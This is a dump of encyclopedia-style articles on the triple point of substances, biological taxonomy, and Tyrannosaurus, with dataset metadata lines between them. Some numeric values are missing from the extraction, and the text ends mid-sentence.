In thermodynamics, the triple point of a substance is the temperature and pressure at which the three phases (gas, liquid, and solid) of that substance coexist in thermodynamic equilibrium. It is that temperature and pressure at which the sublimation, fusion, and vaporisation curves meet. For example, the triple point of mercury occurs at a temperature of and a pressure of 0.165 mPa. In addition to the triple point for solid, liquid, and gas phases, a triple point may involve more than one solid phase, for substances with multiple polymorphs. Helium-4 is unusual in that it has no sublimation/deposition curve and therefore no triple points where its solid phase meets its gas phase. Instead, it has a vapor-liquid-superfluid point, a solid-liquid-superfluid point, a solid-solid-liquid point, and a solid-solid-superfluid point. None of these should be confused with the Lambda Point, which is not any kind of triple point. The term "triple point" was coined in 1873 by James Thomson, brother of Lord Kelvin. The triple points of several substances are used to define points in the ITS-90 international temperature scale, ranging from the triple point of hydrogen (13.8033 K) to the triple point of water (273.16 K, 0.01 °C, or 32.018 °F). Before 2019, the triple point of water was used to define the kelvin, the base unit of thermodynamic temperature in the International System of Units (SI). The kelvin was defined so that the triple point of water is exactly 273.16 K, but that changed with the 2019 revision of the SI, where the kelvin was redefined so that the Boltzmann constant is exactly , and the triple point of water became an experimentally measured constant. Triple point of water Gas–liquid–solid triple point Following the 2019 revision of the SI, the value of the triple point of water is no longer used as a defining point. However, its empirical value remains important: the unique combination of pressure and temperature at which liquid water, solid ice, and water vapor coexist in a stable equilibrium is approximately and a vapor pressure of . Liquid water can only exist at pressures equal to or greater than the triple point. Below this, in the vacuum of outer space, solid ice sublimates, transitioning directly into water vapor when heated at a constant pressure. Conversely, above the triple point, solid ice first melts into liquid water upon heating at a constant pressure, then evaporates or boils to form vapor at a higher temperature. For most substances, the gas–liquid–solid triple point is the minimum temperature where the liquid can exist. For water, this is not the case. The melting point of ordinary ice decreases with pressure, as shown by the phase diagram's dashed green line. Just below the triple point, compression at a constant temperature transforms water vapor first to solid and then to liquid. Historically, during the Mariner 9 mission to Mars, the triple point pressure of water was used to define "sea level". Now, laser altimetry and gravitational measurements are preferred to define Martian elevation. High-pressure phases At high pressures, water has a complex phase diagram with 15 known phases of ice and several triple points, including 10 whose coordinates are shown in the diagram. For example, the triple point at 251 K (−22 °C) and 210 MPa (2070 atm) corresponds to the conditions for the coexistence of ice Ih (ordinary ice), ice III and liquid water, all at equilibrium. There are also triple points for the coexistence of three solid phases, for example ice II, ice V and ice VI at 218 K (−55 °C) and 620 MPa (6120 atm). For those high-pressure forms of ice which can exist in equilibrium with liquid, the diagram shows that melting points increase with pressure. At temperatures above 273 K (0 °C), increasing the pressure on water vapor results first in liquid water and then a high-pressure form of ice. In the range , ice I is formed first, followed by liquid water and then ice III or ice V, followed by other still denser high-pressure forms. Triple-point cells Triple-point cells are used in the calibration of thermometers. For exacting work, triple-point cells are typically filled with a highly pure chemical substance such as hydrogen, argon, mercury, or water (depending on the desired temperature). The purity of these substances can be such that only one part in a million is a contaminant, called "six nines" because it is 99.9999% pure. A specific isotopic composition (for water, VSMOW) is used because variations in isotopic composition cause small changes in the triple point. Triple-point cells are so effective at achieving highly precise, reproducible temperatures, that an international calibration standard for thermometers called ITS–90 relies upon triple-point cells of hydrogen, neon, oxygen, argon, mercury, and water for delineating six of its defined temperature points. Table of triple points This table lists the gas–liquid–solid triple points of several substances. Unless otherwise noted, the data come from the U.S. National Bureau of Standards (now NIST, National Institute of Standards and Technology).
Physical sciences
Phase transitions
null
30463
https://en.wikipedia.org/wiki/Taxonomy%20%28biology%29
Taxonomy (biology)
In biology, taxonomy () is the scientific study of naming, defining (circumscribing) and classifying groups of biological organisms based on shared characteristics. Organisms are grouped into taxa (singular: taxon), and these groups are given a taxonomic rank; groups of a given rank can be aggregated to form a more inclusive group of higher rank, thus creating a taxonomic hierarchy. The principal ranks in modern use are domain, kingdom, phylum (division is sometimes used in botany in place of phylum), class, order, family, genus, and species. The Swedish botanist Carl Linnaeus is regarded as the founder of the current system of taxonomy, as he developed a ranked system known as Linnaean taxonomy for categorizing organisms and binomial nomenclature for naming organisms. With advances in the theory, data and analytical technology of biological systematics, the Linnaean system has transformed into a system of modern biological classification intended to reflect the evolutionary relationships among organisms, both living and extinct. Definition The exact definition of taxonomy varies from source to source, but the core of the discipline remains: the conception, naming, and classification of groups of organisms. As points of reference, recent definitions of taxonomy are presented below: Theory and practice of grouping individuals into species, arranging species into larger groups, and giving those groups names, thus producing a classification. A field of science (and a major component of systematics) that encompasses description, identification, nomenclature, and classification The science of classification, in biology the arrangement of organisms into a classification "The science of classification as applied to living organisms, including the study of means of formation of species, etc." "The analysis of an organism's characteristics for the purpose of classification" "Systematics studies phylogeny to provide a pattern that can be translated into the classification and names of the more inclusive field of taxonomy" (listed as a desirable but unusual definition) The varied definitions either place taxonomy as a sub-area of systematics (definition 2), invert that relationship (definition 6), or appear to consider the two terms synonymous. There is some disagreement as to whether biological nomenclature is considered a part of taxonomy (definitions 1 and 2), or a part of systematics outside taxonomy. For example, definition 6 is paired with the following definition of systematics that places nomenclature outside taxonomy: Systematics: "The study of the identification, taxonomy, and nomenclature of organisms, including the classification of living things with regard to their natural relationships and the study of variation and the evolution of taxa". In 1970, Michener et al. defined "systematic biology" and "taxonomy" (terms that are often confused and used interchangeably) in relation to one another as follows: Systematic biology (hereafter called simply systematics) is the field that (a) provides scientific names for organisms, (b) describes them, (c) preserves collections of them, (d) provides classifications for the organisms, keys for their identification, and data on their distributions, (e) investigates their evolutionary histories, and (f) considers their environmental adaptations. This is a field with a long history that in recent years has experienced a notable renaissance, principally with respect to theoretical content. Part of the theoretical material has to do with evolutionary areas (topics e and f above), the rest relates especially to the problem of classification. Taxonomy is that part of Systematics concerned with topics (a) to (d) above. A whole set of terms including taxonomy, systematic biology, systematics, scientific classification, biological classification, and phylogenetics have at times had overlapping meanings – sometimes the same, sometimes slightly different, but always related and intersecting. The broadest meaning of "taxonomy" is used here. The term itself was introduced in 1813 by de Candolle, in his Théorie élémentaire de la botanique. John Lindley provided an early definition of systematics in 1830, although he wrote of "systematic botany" rather than using the term "systematics". Europeans tend to use the terms "systematics" and "biosystematics" for the study of biodiversity as a whole, whereas North Americans tend to use "taxonomy" more frequently. However, taxonomy, and in particular alpha taxonomy, is more specifically the identification, description, and naming (i.e., nomenclature) of organisms, while "classification" focuses on placing organisms within hierarchical groups that show their relationships to other organisms. Monograph and taxonomic revision A taxonomic revision or taxonomic review is a novel analysis of the variation patterns in a particular taxon. This analysis may be executed on the basis of any combination of the various available kinds of characters, such as morphological, anatomical, palynological, biochemical and genetic. A monograph or complete revision is a revision that is comprehensive for a taxon for the information given at a particular time, and for the entire world. Other (partial) revisions may be restricted in the sense that they may only use some of the available character sets or have a limited spatial scope. A revision results in a conformation of or new insights in the relationships between the subtaxa within the taxon under study, which may lead to a change in the classification of these subtaxa, the identification of new subtaxa, or the merger of previous subtaxa. Taxonomic characters Taxonomic characters are the taxonomic attributes that can be used to provide the evidence from which relationships (the phylogeny) between taxa are inferred. Kinds of taxonomic characters include: Morphological characters General external morphology Special structures (e.g., genitalia) Internal morphology (anatomy) Embryology Karyology and other cytological factors Physiological characters Metabolic factors Body secretions Genic sterility factors Molecular characters Immunological distance Electrophoretic differences Amino acid sequences of proteins DNA hybridization DNA and RNA sequences Restriction endonuclease analyses Other molecular differences Behavioral characters Courtship and other ethological isolating mechanisms Other behavior patterns Ecological characters Habit and habitats Food Seasonal variations Parasites and hosts Geographic characters General biogeographic distribution patterns Sympatric-allopatric relationship of populations Alpha and beta taxonomy The term "alpha taxonomy" is primarily used to refer to the discipline of finding, describing, and naming taxa, particularly species. In earlier literature, the term had a different meaning, referring to morphological taxonomy, and the products of research through the end of the 19th century. William Bertram Turrill introduced the term "alpha taxonomy" in a series of papers published in 1935 and 1937 in which he discussed the philosophy and possible future directions of the discipline of taxonomy. ... there is an increasing desire amongst taxonomists to consider their problems from wider viewpoints, to investigate the possibilities of closer co-operation with their cytological, ecological and genetics colleagues and to acknowledge that some revision or expansion, perhaps of a drastic nature, of their aims and methods, may be desirable ... Turrill (1935) has suggested that while accepting the older invaluable taxonomy, based on structure, and conveniently designated "alpha", it is possible to glimpse a far-distant taxonomy built upon as wide a basis of morphological and physiological facts as possible, and one in which "place is found for all observational and experimental data relating, even if indirectly, to the constitution, subdivision, origin, and behaviour of species and other taxonomic groups". Ideals can, it may be said, never be completely realized. They have, however, a great value of acting as permanent stimulants, and if we have some, even vague, ideal of an "omega" taxonomy we may progress a little way down the Greek alphabet. Some of us please ourselves by thinking we are now groping in a "beta" taxonomy. Turrill thus explicitly excludes from alpha taxonomy various areas of study that he includes within taxonomy as a whole, such as ecology, physiology, genetics, and cytology. He further excludes phylogenetic reconstruction from alpha taxonomy. Later authors have used the term in a different sense, to mean the delimitation of species (not subspecies or taxa of other ranks), using whatever investigative techniques are available, and including sophisticated computational or laboratory techniques. Thus, Ernst Mayr in 1968 defined "beta taxonomy" as the classification of ranks higher than species.An understanding of the biological meaning of variation and of the evolutionary origin of groups of related species is even more important for the second stage of taxonomic activity, the sorting of species into groups of relatives ("taxa") and their arrangement in a hierarchy of higher categories. This activity is what the term classification denotes; it is also referred to as "beta taxonomy". Microtaxonomy and macrotaxonomy How species should be defined in a particular group of organisms gives rise to practical and theoretical problems that are referred to as the species problem. The scientific work of deciding how to define species has been called microtaxonomy. By extension, macrotaxonomy is the study of groups at the higher taxonomic ranks subgenus and above, or simply in clades that include more than one taxon considered a species, expressed in terms of phylogenetic nomenclature. History While some descriptions of taxonomic history attempt to date taxonomy to ancient civilizations, a truly scientific attempt to classify organisms did not occur until the 18th century, with the possible exception of Aristotle, whose works hint at a taxonomy. Earlier works were primarily descriptive and focused on plants that were useful in agriculture or medicine. There are a number of stages in this scientific thinking. Early taxonomy was based on arbitrary criteria, the so-called "artificial systems", including Linnaeus's system of sexual classification for plants (Linnaeus's 1735 classification of animals was entitled "Systema Naturae" ("the System of Nature"), implying that he, at least, believed that it was more than an "artificial system"). Later came systems based on a more complete consideration of the characteristics of taxa, referred to as "natural systems", such as those of de Jussieu (1789), de Candolle (1813) and Bentham and Hooker (1862–1863). These classifications described empirical patterns and were pre-evolutionary in thinking. The publication of Charles Darwin's On the Origin of Species (1859) led to a new explanation for classifications, based on evolutionary relationships. This was the concept of phyletic systems, from 1883 onwards. This approach was typified by those of Eichler (1883) and Engler (1886–1892). The advent of cladistic methodology in the 1970s led to classifications based on the sole criterion of monophyly, supported by the presence of synapomorphies. Since then, the evidentiary basis has been expanded with data from molecular genetics that for the most part complements traditional morphology. Pre-Linnaean Early taxonomists Naming and classifying human surroundings likely began with the onset of language. Distinguishing poisonous plants from edible plants is integral to the survival of human communities. Medicinal plant illustrations show up in Egyptian wall paintings from , indicating that the uses of different species were understood and that a basic taxonomy was in place. Ancient times Organisms were first classified by Aristotle (Greece, 384–322 BC) during his stay on the Island of Lesbos. He classified beings by their parts, or in modern terms attributes, such as having live birth, having four legs, laying eggs, having blood, or being warm-bodied. He divided all living things into two groups: plants and animals. Some of his groups of animals, such as Anhaima (animals without blood, translated as invertebrates) and Enhaima (animals with blood, roughly the vertebrates), as well as groups like the sharks and cetaceans, are commonly used. His student Theophrastus (Greece, 370–285 BC) carried on this tradition, mentioning some 500 plants and their uses in his Historia Plantarum. Several plant genera can be traced back to Theophrastus, such as Cornus, Crocus, and Narcissus. Medieval Taxonomy in the Middle Ages was largely based on the Aristotelian system, with additions concerning the philosophical and existential order of creatures. This included concepts such as the great chain of being in the Western scholastic tradition, again deriving ultimately from Aristotle. The Aristotelian system did not classify plants or fungi, due to the lack of microscopes at the time, as his ideas were based on arranging the complete world in a single continuum, as per the scala naturae (the Natural Ladder). This, as well, was taken into consideration in the great chain of being. Advances were made by scholars such as Procopius, Timotheus of Gaza, Demetrios Pepagomenos, and Thomas Aquinas. Medieval thinkers used abstract philosophical and logical categorizations more suited to abstract philosophy than to pragmatic taxonomy. Renaissance and early modern During the Renaissance and the Age of Enlightenment, categorizing organisms became more prevalent, and taxonomic works became ambitious enough to replace the ancient texts. This is sometimes credited to the development of sophisticated optical lenses, which allowed the morphology of organisms to be studied in much greater detail. One of the earliest authors to take advantage of this leap in technology was the Italian physician Andrea Cesalpino (1519–1603), who has been called "the first taxonomist". His magnum opus De Plantis came out in 1583, and described more than 1,500 plant species. Two large plant families that he first recognized are in use: the Asteraceae and Brassicaceae. In the 17th century, John Ray (England, 1627–1705) wrote many important taxonomic works. Arguably his greatest accomplishment was Methodus Plantarum Nova (1682), in which he published details of over 18,000 plant species. At the time, his classifications were perhaps the most complex yet produced by any taxonomist, as he based his taxa on many combined characters. The next major taxonomic works were produced by Joseph Pitton de Tournefort (France, 1656–1708). His work from 1700, Institutiones Rei Herbariae, included more than 9,000 species in 698 genera, which directly influenced Linnaeus, as it was the text he used as a young student. Linnaean era The Swedish botanist Carl Linnaeus (1707–1778) ushered in a new era of taxonomy. With his major works Systema Naturae 1st Edition in 1735, Species Plantarum in 1753, and Systema Naturae 10th Edition, he revolutionized modern taxonomy. His works implemented a standardized binomial naming system for animal and plant species, which proved to be an elegant solution to a chaotic and disorganized taxonomic literature. He not only introduced the standard of class, order, genus, and species, but also made it possible to identify plants and animals from his book, by using the smaller parts of the flower (known as the Linnaean system). Plant and animal taxonomists regard Linnaeus' work as the "starting point" for valid names (at 1753 and 1758 respectively). Names published before these dates are referred to as "pre-Linnaean", and not considered valid (with the exception of spiders published in Svenska Spindlar). Even taxonomic names published by Linnaeus himself before these dates are considered pre-Linnaean. The digital era of taxonomy Modern taxonomy is heavily influenced by technology such as DNA sequencing, bioinformatics, databases, and imaging. Modern system of classification A pattern of groups nested within groups was specified by Linnaeus' classifications of plants and animals, and these patterns began to be represented as dendrograms of the animal and plant kingdoms toward the end of the 18th century, well before Charles Darwin's On the Origin of Species was published. The pattern of the "Natural System" did not entail a generating process, such as evolution, but may have implied it, inspiring early transmutationist thinkers. Among early works exploring the idea of a transmutation of species were Zoonomia in 1796 by Erasmus Darwin (Charles Darwin's grandfather), and Jean-Baptiste Lamarck's Philosophie zoologique of 1809. The idea was popularized in the Anglophone world by the speculative but widely read Vestiges of the Natural History of Creation, published anonymously by Robert Chambers in 1844. With Darwin's theory, a general acceptance quickly appeared that a classification should reflect the Darwinian principle of common descent. Tree of life representations became popular in scientific works, with known fossil groups incorporated. One of the first modern groups tied to fossil ancestors was birds. Using the then newly discovered fossils of Archaeopteryx and Hesperornis, Thomas Henry Huxley pronounced that they had evolved from dinosaurs, a group formally named by Richard Owen in 1842. The resulting description, that of dinosaurs "giving rise to" or being "the ancestors of" birds, is the essential hallmark of evolutionary taxonomic thinking. As more and more fossil groups were found and recognized in the late 19th and early 20th centuries, palaeontologists worked to understand the history of animals through the ages by linking together known groups. With the modern evolutionary synthesis of the early 1940s, an essentially modern understanding of the evolution of the major groups was in place. As evolutionary taxonomy is based on Linnaean taxonomic ranks, the two terms are largely interchangeable in modern use. The cladistic method has emerged since the 1960s. In 1958, Julian Huxley used the term clade. Later, in 1960, Cain and Harrison introduced the term cladistic. The salient feature is arranging taxa in a hierarchical evolutionary tree, with the desired objective of all named taxa being monophyletic. A taxon is called monophyletic if it includes all the descendants of an ancestral form. Groups that have descendant groups removed from them are termed paraphyletic, while groups representing more than one branch from the tree of life are called polyphyletic. Monophyletic groups are recognized and diagnosed on the basis of synapomorphies, shared derived character states. Cladistic classifications are compatible with traditional Linnean taxonomy and the Codes of Zoological and Botanical nomenclature, to a certain extent. An alternative system of nomenclature, the International Code of Phylogenetic Nomenclature or PhyloCode has been proposed, which regulates the formal naming of clades. Linnaean ranks are optional and have no formal standing under the PhyloCode, which is intended to coexist with the current, rank-based codes. While popularity of phylogenetic nomenclature has grown steadily in the last few decades, it remains to be seen whether a majority of systematists will eventually adopt the PhyloCode or continue using the current systems of nomenclature that have been employed (and modified, but arguably not as much as some systematists wish) for over 250 years. Kingdoms and domains Well before Linnaeus, plants and animals were considered separate Kingdoms. Linnaeus used this as the top rank, dividing the physical world into the vegetable, animal and mineral kingdoms. As advances in microscopy made the classification of microorganisms possible, the number of kingdoms increased, five- and six-kingdom systems being the most common. Domains are a relatively new grouping. First proposed in 1977, Carl Woese's three-domain system was not generally accepted until later. One main characteristic of the three-domain method is the separation of Archaea and Bacteria, previously grouped into the single kingdom Bacteria (a kingdom also sometimes called Monera), with the Eukaryota for all organisms whose cells contain a nucleus. A small number of scientists include a sixth kingdom, Archaea, but do not accept the domain method. Thomas Cavalier-Smith, who published extensively on the classification of protists, in 2002 proposed that the Neomura, the clade that groups together the Archaea and Eucarya, would have evolved from Bacteria, more precisely from Actinomycetota. His 2004 classification treated the archaeobacteria as part of a subkingdom of the kingdom Bacteria, i.e., he rejected the three-domain system entirely. Stefan Luketa in 2012 proposed a five "dominion" system, adding Prionobiota (acellular and without nucleic acid) and Virusobiota (acellular but with nucleic acid) to the traditional three domains. Recent comprehensive classifications Partial classifications exist for many individual groups of organisms and are revised and replaced as new information becomes available; however, comprehensive, published treatments of most or all life are rarer; recent examples are that of Adl et al., 2012 and 2019, which covers eukaryotes only with an emphasis on protists, and Ruggiero et al., 2015, covering both eukaryotes and prokaryotes to the rank of Order, although both exclude fossil representatives. A separate compilation (Ruggiero, 2014) covers extant taxa to the rank of Family. Other, database-driven treatments include the Encyclopedia of Life, the Global Biodiversity Information Facility, the NCBI taxonomy database, the Interim Register of Marine and Nonmarine Genera, the Open Tree of Life, and the Catalogue of Life. The Paleobiology Database is a resource for fossils. Application Biological taxonomy is a sub-discipline of biology, and is generally practiced by biologists known as "taxonomists", though enthusiastic naturalists are also frequently involved in the publication of new taxa. Because taxonomy aims to describe and organize life, the work conducted by taxonomists is essential for the study of biodiversity and the resulting field of conservation biology. Classifying organisms Biological classification is a critical component of the taxonomic process. As a result, it informs the user as to what the relatives of the taxon are hypothesized to be. Biological classification uses taxonomic ranks, including among others (in order from most inclusive to least inclusive): domain, kingdom, phylum, class, order, family, genus, species, and strain. Taxonomic descriptions The "definition" of a taxon is encapsulated by its description or its diagnosis or by both combined. There are no set rules governing the definition of taxa, but the naming and publication of new taxa is governed by sets of rules. In zoology, the nomenclature for the more commonly used ranks (superfamily to subspecies), is regulated by the International Code of Zoological Nomenclature (ICZN Code). In the fields of phycology, mycology, and botany, the naming of taxa is governed by the International Code of Nomenclature for algae, fungi, and plants (ICN). The initial description of a taxon involves five main requirements: The taxon must be given a name based on the 26 letters of the Latin alphabet (a binomial for new species, or uninomial for other ranks). The name must be unique (i.e. not a homonym). The description must be based on at least one name-bearing type specimen. It should include statements about appropriate attributes either to describe (define) the taxon or to differentiate it from other taxa (the diagnosis, ICZN Code, Article 13.1.1, ICN, Article 38, which may or may not be based on morphology). Both codes deliberately separate defining the content of a taxon (its circumscription) from defining its name. These first four requirements must be published in a work that is obtainable in numerous identical copies, as a permanent scientific record. However, often much more information is included, like the geographic range of the taxon, ecological notes, chemistry, behavior, etc. How researchers arrive at their taxa varies: depending on the available data, and resources, methods vary from simple quantitative or qualitative comparisons of striking features, to elaborate computer analyses of large amounts of DNA sequence data. Author citation An "authority" may be placed after a scientific name. The authority is the name of the scientist or scientists who first validly published the name. For example, in 1758, Linnaeus gave the Asian elephant the scientific name Elephas maximus, so the name is sometimes written as "Elephas maximus Linnaeus, 1758". The names of authors are often abbreviated: the abbreviation L., for Linnaeus, is commonly used. In botany, there is, in fact, a regulated list of standard abbreviations (see list of botanists by author abbreviation). The system for assigning authorities differs slightly between botany and zoology. However, it is standard that if the genus of a species has been changed since the original description, the original authority's name is placed in parentheses. Phenetics In phenetics, also known as taximetrics, or numerical taxonomy, organisms are classified based on overall similarity, regardless of their phylogeny or evolutionary relationships. It results in a measure of hypergeometric "distance" between taxa. Phenetic methods have become relatively rare in modern times, largely superseded by cladistic analyses, as phenetic methods do not distinguish shared ancestral (or plesiomorphic) traits from shared derived (or apomorphic) traits. However, certain phenetic methods, such as neighbor joining, have persisted, as rapid estimators of relationships when more advanced methods (such as Bayesian inference) are too computationally expensive. Databases Modern taxonomy uses database technologies to search and catalogue classifications and their documentation. While there is no commonly used database, there are comprehensive databases such as the Catalogue of Life, which attempts to list every documented species. The catalogue listed 1.64 million species for all kingdoms , claiming coverage of more than three-quarters of the estimated species known to modern science.
Biology and health sciences
Biology
null
30467
https://en.wikipedia.org/wiki/Tyrannosaurus
Tyrannosaurus
Tyrannosaurus () is a genus of large theropod dinosaur. The type species Tyrannosaurus rex ( meaning 'king' in Latin), often shortened to T. rex or colloquially T-Rex, is one of the best represented theropods. It lived throughout what is now western North America, on what was then an island continent known as Laramidia. Tyrannosaurus had a much wider range than other tyrannosaurids. Fossils are found in a variety of rock formations dating to the latest Campanian-Maastrichtian ages of the late Cretaceous period, 72.7 to 66 million years ago, with isolated specimens possibly indicating an earlier origin in the middle Campanian. It was the last known member of the tyrannosaurids and among the last non-avian dinosaurs to exist before the Cretaceous–Paleogene extinction event. Like other tyrannosaurids, Tyrannosaurus was a bipedal carnivore with a massive skull balanced by a long, heavy tail. Relative to its large and powerful hind limbs, the forelimbs of Tyrannosaurus were short but unusually powerful for their size, and they had two clawed digits. The most complete specimen measures in length, but according to most modern estimates, Tyrannosaurus could have exceeded sizes of in length, in hip height, and in mass. Although some other theropods might have rivaled or exceeded Tyrannosaurus in size, it is still among the largest known land predators, with its estimated bite force being the largest among all terrestrial animals. By far the largest carnivore in its environment, Tyrannosaurus rex was most likely an apex predator, preying upon hadrosaurs, juvenile armored herbivores like ceratopsians and ankylosaurs, and possibly sauropods. Some experts have suggested the dinosaur was primarily a scavenger. The question of whether Tyrannosaurus was an apex predator or a pure scavenger was among the longest debates in paleontology. Most paleontologists today accept that Tyrannosaurus was both a predator and a scavenger. Specimens of Tyrannosaurus rex include some that are nearly complete skeletons. Soft tissue and proteins have been reported in at least one of these specimens. The abundance of fossil material has allowed significant research into many aspects of its biology, including its life history and biomechanics. The feeding habits, physiology, and potential speed of Tyrannosaurus rex are a few subjects of debate. Its taxonomy is also controversial, as some scientists consider Tarbosaurus bataar from Asia to be a third Tyrannosaurus species, while others maintain Tarbosaurus is a separate genus. Several other genera of North American tyrannosaurids have also been synonymized with Tyrannosaurus. At present, two species of Tyrannosaurus are considered valid; the type species, T. rex, and the earlier in age and more recently discovered T. mcraeensis. As the archetypal theropod, Tyrannosaurus has been one of the best-known dinosaurs since the early 20th century and has been featured in film, advertising, postal stamps, and many other media. History of research Earliest finds A tooth from what is now documented as a Tyrannosaurus rex was found in July 1874 upon South Table Mountain (Colorado) by Jarvis Hall (Colorado) student Peter T. Dotson under the auspices of Prof. Arthur Lakes near Golden, Colorado. In the early 1890s, John Bell Hatcher collected postcranial elements in eastern Wyoming. The fossils were believed to be from the large species Ornithomimus grandis (now Deinodon) but are now considered T. rex remains. In 1892, Edward Drinker Cope found two vertebral fragments of a large dinosaur. Cope believed the fragments belonged to an "agathaumid" (ceratopsid) dinosaur, and named them Manospondylus gigas, meaning "giant porous vertebra", in reference to the numerous openings for blood vessels he found in the bone. The M. gigas remains were, in 1907, identified by Hatcher as those of a theropod rather than a ceratopsid. Henry Fairfield Osborn recognized the similarity between Manospondylus gigas and T. rex as early as 1917, by which time the second vertebra had been lost. Owing to the fragmentary nature of the Manospondylus vertebrae, Osborn did not synonymize the two genera, instead considering the older genus indeterminate. In June 2000, the Black Hills Institute found around 10% of a Tyrannosaurus skeleton (BHI 6248) at a site that might have been the original M. gigas locality. Skeleton discovery and naming Barnum Brown, assistant curator of the American Museum of Natural History, found the first partial skeleton of T. rex in eastern Wyoming in 1900. Brown found another partial skeleton in the Hell Creek Formation in Montana in 1902, comprising approximately 34 fossilized bones. Writing at the time Brown said "Quarry No. 1 contains the femur, pubes, humerus, three vertebrae and two undetermined bones of a large Carnivorous Dinosaur not described by Marsh. ... I have never seen anything like it from the Cretaceous." Henry Fairfield Osborn, president of the American Museum of Natural History, named the second skeleton T. rex in 1905. The generic name is derived from the Greek words (, meaning "tyrant") and (, meaning "lizard"). Osborn used the Latin word , meaning "king", for the specific name. The full binomial therefore translates to "tyrant lizard the king" or "King Tyrant Lizard", emphasizing the animal's size and presumed dominance over other species of the time. Osborn named the other specimen Dynamosaurus imperiosus in a paper in 1905. In 1906, Osborn recognized that the two skeletons were from the same species and selected Tyrannosaurus as the preferred name. In 1941, the T. rex type specimen was sold to the Carnegie Museum of Natural History in Pittsburgh, Pennsylvania, for $7,000. The original Dynamosaurus material now resides in the collections of the Natural History Museum, London. Dynamosaurus would later be honored by the 2018 description of another species of tyrannosaurid by Andrew McDonald and colleagues, Dynamoterror dynastes, whose name was chosen in reference to the 1905 name, as it had been a "childhood favorite" of McDonald's. From the 1910s through the end of the 1950s, Barnum's discoveries remained the only specimens of Tyrannosaurus, as the Great Depression and wars kept many paleontologists out of the field. Resurgent interest Beginning in the 1960s, there was renewed interest in Tyrannosaurus, resulting in the recovery of 42 skeletons (5–80% complete by bone count) from Western North America. In 1967, Dr. William MacMannis located and recovered the skeleton named "MOR 008", which is 15% complete by bone count and has a reconstructed skull displayed at the Museum of the Rockies. The 1990s saw numerous discoveries, with nearly twice as many finds as in all previous years, including two of the most complete skeletons found to date: Sue and Stan. Sue Hendrickson, an amateur paleontologist, discovered the most complete (approximately 85%) and largest Tyrannosaurus skeleton in the Hell Creek Formation on August 12, 1990. The specimen Sue, named after the discoverer, was the object of a legal battle over its ownership. In 1997, the litigation was settled in favor of Maurice Williams, the original land owner. The fossil collection was purchased by the Field Museum of Natural History at auction for $7.6 million, making it the most expensive dinosaur skeleton until the sale of Stan for $31.8 million in 2020. From 1998 to 1999, Field Museum of Natural History staff spent over 25,000 hours taking the rock off the bones. The bones were then shipped to New Jersey where the mount was constructed, then shipped back to Chicago for the final assembly. The mounted skeleton opened to the public on May 17, 2000, in the Field Museum of Natural History. A study of this specimen's fossilized bones showed that Sue reached full size at age 19 and died at the age of 28, the longest estimated life of any tyrannosaur known. Another Tyrannosaurus, nicknamed Stan (BHI 3033), in honor of amateur paleontologist Stan Sacrison, was recovered from the Hell Creek Formation in 1992. Stan is the second most complete skeleton found, with 199 bones recovered representing 70% of the total. This tyrannosaur also had many bone pathologies, including broken and healed ribs, a broken (and healed) neck, and a substantial hole in the back of its head, about the size of a Tyrannosaurus tooth. In 1998, 20-year-old Bucky Derflinger noticed a T. rex toe exposed above ground, making him the youngest person to discover a Tyrannosaurus. The specimen, dubbed Bucky in honor of its discoverer, was a young adult, tall and long. Bucky is the first Tyrannosaurus to be found that preserved a furcula (wishbone). Bucky is permanently displayed at The Children's Museum of Indianapolis. In the summer of 2000, crews organized by Jack Horner discovered five Tyrannosaurus skeletons near the Fort Peck Reservoir. In 2001, a 50% complete skeleton of a juvenile Tyrannosaurus was discovered in the Hell Creek Formation by a crew from the Burpee Museum of Natural History. Dubbed Jane (BMRP 2002.4.1), the find was thought to be the first known skeleton of a pygmy tyrannosaurid, Nanotyrannus, but subsequent research revealed that it is more likely a juvenile Tyrannosaurus, and the most complete juvenile example known; Jane is exhibited at the Burpee Museum of Natural History. In 2002, a skeleton nicknamed "Wyrex", discovered by amateur collectors Dan Wells and Don Wyrick, had 114 bones and was 38% complete. The dig was concluded over 3 weeks in 2004 by the Black Hills Institute with the first live online Tyrannosaurus excavation providing daily reports, photos, and video. In 2006, Montana State University revealed that it possessed the largest Tyrannosaurus skull yet discovered (from a specimen named MOR 008), measuring long. Subsequent comparisons indicated that the longest head was (from specimen LACM 23844) and the widest head was (from Sue). Footprints Two isolated fossilized footprints have been tentatively assigned to T. rex. The first was discovered at Philmont Scout Ranch, New Mexico, in 1983 by American geologist Charles Pillmore. Originally thought to belong to a hadrosaurid, examination of the footprint revealed a large 'heel' unknown in ornithopod dinosaur tracks, and traces of what may have been a hallux, the dewclaw-like fourth digit of the tyrannosaur foot. The footprint was published as the ichnogenus Tyrannosauripus pillmorei in 1994, by Martin Lockley and Adrian Hunt. Lockley and Hunt suggested that it was very likely the track was made by a T. rex, which would make it the first known footprint from this species. The track was made in what was once a vegetated wetland mudflat. It measures long by wide. A second footprint that may have been made by a Tyrannosaurus was first reported in 2007 by British paleontologist Phil Manning, from the Hell Creek Formation of Montana. This second track measures long, shorter than the track described by Lockley and Hunt. Whether or not the track was made by Tyrannosaurus is unclear, though Tyrannosaurus is the only large theropod known to have existed in the Hell Creek Formation. A set of footprints in Glenrock, Wyoming dating to the Maastrichtian stage of the Late Cretaceous and hailing from the Lance Formation were described by Scott Persons, Phil Currie and colleagues in 2016, and are believed to belong to either a juvenile T. rex or the dubious tyrannosaurid Nanotyrannus lancensis. From measurements and based on the positions of the footprints, the animal was believed to be traveling at a walking speed of around 2.8 to 5 miles per hour and was estimated to have a hip height of . A follow-up paper appeared in 2017, increasing the speed estimations by 50–80%. Description Size T. rex was one of the largest land carnivores of all time. One of its largest and the most complete specimens, nicknamed Sue (FMNH PR2081), is located at the Field Museum of Natural History in Chicago. Sue measured long, was tall at the hips, and according to the most recent studies, using a variety of techniques, maximum body masses have been estimated approximately . A specimen nicknamed Scotty (RSM P2523.8), located at the Royal Saskatchewan Museum, is reported to measure in length. Using a mass estimation technique that extrapolates from the circumference of the femur, Scotty was estimated as the largest known specimen at in body mass. Not every adult Tyrannosaurus specimen recovered is as big. Historically average adult mass estimates have varied widely over the years, from as low as , to more than , with most modern estimates ranging between . A 2024 study found that there was little evidence of size-based sexual dimorphism in T. rex. Skull The largest known T. rex skulls measure up to in length. Large fenestrae (openings) in the skull reduced weight, as in all carnivorous theropods. In other respects Tyrannosaurus's skull was significantly different from those of large non-tyrannosaurid theropods. It was extremely wide at the rear but had a narrow snout, allowing unusually good binocular vision. The skull bones were massive and the nasals and some other bones were fused, preventing movement between them; but many were pneumatized (contained a "honeycomb" of tiny air spaces) and thus lighter. These and other skull-strengthening features are part of the tyrannosaurid trend towards an increasingly powerful bite, which easily surpassed that of all 